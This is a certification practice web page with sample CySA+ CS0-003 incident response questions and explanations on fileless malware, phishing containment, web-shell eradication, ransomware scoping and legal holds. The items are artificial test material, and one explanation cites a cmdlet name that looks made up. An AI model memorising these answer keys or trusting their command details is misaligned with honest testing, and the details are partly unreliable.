Courseiva
Knowledge + Practice
CertificationsVendorsCareer RoadmapsLabs & ToolsStudy GuidesGlossaryPractice Questions
C
Courseiva

Free IT certification practice questions with explained answers for CCNA, CompTIA, AWS, Azure, Google Cloud, and more.

Certification Practice Questions

CCNA practice questionsSecurity+ SY0-701 practice questionsAWS SAA-C03 practice questionsAZ-104 practice questionsAZ-900 practice questionsCLF-C02 practice questionsA+ Core 1 practice questionsGoogle Cloud ACE practice questionsCySA+ CS0-003 practice questionsNetwork+ N10-009 practice questions
View all certifications →

Product

CertificationsCertification PathsExam TopicsPractice TestsExam Dumps vs Practice TestsStudy HubComparisons

Company

AboutContactEditorial PolicyQuestion Writing PolicyTrust Center

Legal

Privacy PolicyTerms of Service

Courseiva is a free IT certification practice platform offering original exam-style practice questions, detailed explanations, topic-based practice, mock exams, readiness tracking, and study analytics for Cisco, CompTIA, Microsoft, AWS, and other technology certifications.

© 2026 Courseiva. Courseiva is operated by JTNetSolutions Ltd. All rights reserved.

Courseiva is an independent certification practice platform and is not affiliated with, endorsed by, or sponsored by Cisco, Microsoft, AWS, CompTIA, Google, ISC2, ISACA, or any other certification vendor. Vendor names and certification marks are used only to identify the exams learners are preparing for.

HomeCertificationsCS0-003TopicsIncident Response and Management
Free · No Signup RequiredCompTIA · CS0-003

CS0-003 Incident Response and Management Practice Questions

20+ practice questions focused on Incident Response and Management — one of the most tested topics on the CompTIA CySA+ CS0-003 exam. Each question includes a detailed explanation so you learn why the right answer is correct.

Start Incident Response and Management Practice

Exam Domains

Security OperationsVulnerability ManagementIncident Response and ManagementReporting and CommunicationAll domains →

Study Tools

Practice TestMock ExamFlashcardsAll Topics

Sample Incident Response and Management Questions

Practice all 20+ →
1.

A host is suspected of running fileless malware. Which artefacts should be collected quickly? (Choose two.)

A.Memory image or live response data
B.Active network connections and running processes
C.A list of cafeteria purchases
D.A printed office map

Explanation: Fileless malware operates in memory without writing to disk, so capturing a memory image or live response data preserves the malicious code, injected DLLs, and process hollowing artifacts that would vanish on reboot. Active network connections and running processes reveal the malware's C2 communications and its in-memory execution context, which are critical for identifying the infection vector and scope.

2.

A phishing incident led to credential theft. Which containment actions are appropriate? (Choose two.)

A.Reset affected credentials and revoke active sessions
B.Delete all user mailboxes
C.Disable DNS for the entire company indefinitely
D.Search for mailbox rules or OAuth grants created after compromise

Explanation: Option A is correct because immediately resetting compromised credentials and revoking active sessions (e.g., via Azure AD 'Revoke-AzureADUserAllRefreshToken' or Active Directory 'Reset-ADAccountPassword' combined with 'Revoke-AuthenticationTokens') invalidates the attacker's access tokens and session cookies, preventing further lateral movement or data exfiltration. This aligns with the NIST SP 800-61 containment phase, which prioritizes cutting off attacker access while preserving forensic evidence.

3.

Which actions belong in eradication after a confirmed web-shell compromise? (Choose two.)

A.Remove the web shell and close the exploited vulnerability
B.Reconnect the server before checking persistence
C.Rotate credentials exposed to the compromised web server
D.Only block the analyst's IP address

Explanation: Option A is correct because removing the web shell eliminates the attacker's foothold, and closing the exploited vulnerability (e.g., patching the application, disabling vulnerable functions like `eval()` or `system()`, or updating a CMS plugin) prevents re-exploitation. This aligns with the eradication phase of incident response, which aims to remove all artifacts of the compromise and harden the system against the same attack vector.

4.

What should be included in incident scoping for ransomware? (Choose three.)

A.Initial infected host and user context
B.The brand of office chairs near the server room
C.Backup integrity and last known clean restore point
D.Shares or systems touched by the compromised account

Explanation: Option A is correct because identifying the initial infected host and user context is critical for understanding the attack vector, containing the threat, and preventing further spread. In ransomware incidents, the first compromised system often reveals the entry point (e.g., phishing email, RDP brute force) and the user account used, which helps scope the blast radius and prioritize remediation.

5.

A legal hold is issued during an investigation. Which actions support it? (Choose two.)

A.Preserve relevant logs, mailboxes, images, and tickets
B.Let each team decide informally what to delete
C.Purge audit logs to save storage
D.Suspend routine deletion for in-scope evidence

Explanation: A legal hold (litigation hold) requires preservation of all potentially relevant electronically stored information (ESI). Preserving logs, mailboxes, images, and tickets ensures that data is not altered or deleted, maintaining its integrity for forensic analysis and legal proceedings. This action directly supports the hold by preventing spoliation and ensuring compliance with discovery obligations.

+15 more Incident Response and Management questions available

Practice all Incident Response and Management questions

How to master Incident Response and Management for CS0-003

1. Baseline your knowledge

Start with 10 questions to gauge your current understanding of Incident Response and Management. This tells you whether you need a concept refresher or just practice.

2. Review every explanation

For each question — right or wrong — read the full explanation. Understanding why an answer is correct is more valuable than knowing the answer itself.

3. Focus on exam traps

Incident Response and Management questions on the CS0-003 frequently use trap wording. Look for subtle differences in answers that test your precision, not just general knowledge.

4. Reach 80% consistently

Do repeated sessions until you score 80%+ three times in a row. Then move to mixed-mode practice to test cross-topic recall under realistic conditions.

Frequently asked questions

How many CS0-003 Incident Response and Management questions are on the real exam?

The exact number varies per candidate. Incident Response and Management is tested as part of the CompTIA CySA+ CS0-003 blueprint. Practicing with targeted Incident Response and Management questions ensures you can handle any format or difficulty that appears.

Are these CS0-003 Incident Response and Management practice questions free?

Yes. Courseiva provides free CS0-003 practice questions across all exam topics and domains. The platform includes topic-based practice, mock exams, missed-question review, bookmarked questions, and readiness tracking — no account required.

Is Incident Response and Management one of the harder CS0-003 topics?

Difficulty is subjective, but Incident Response and Management is a high-priority exam concept tested in multiple ways — direct recall, scenario analysis, and command-output interpretation. Consistent practice is the best way to build confidence.

Ready to practice?

Launch a full Incident Response and Management practice session with instant scoring and detailed explanations.

Start Incident Response and Management Practice →

Topic Info

Topic

Incident Response and Management

Exam

CS0-003

Questions available

20+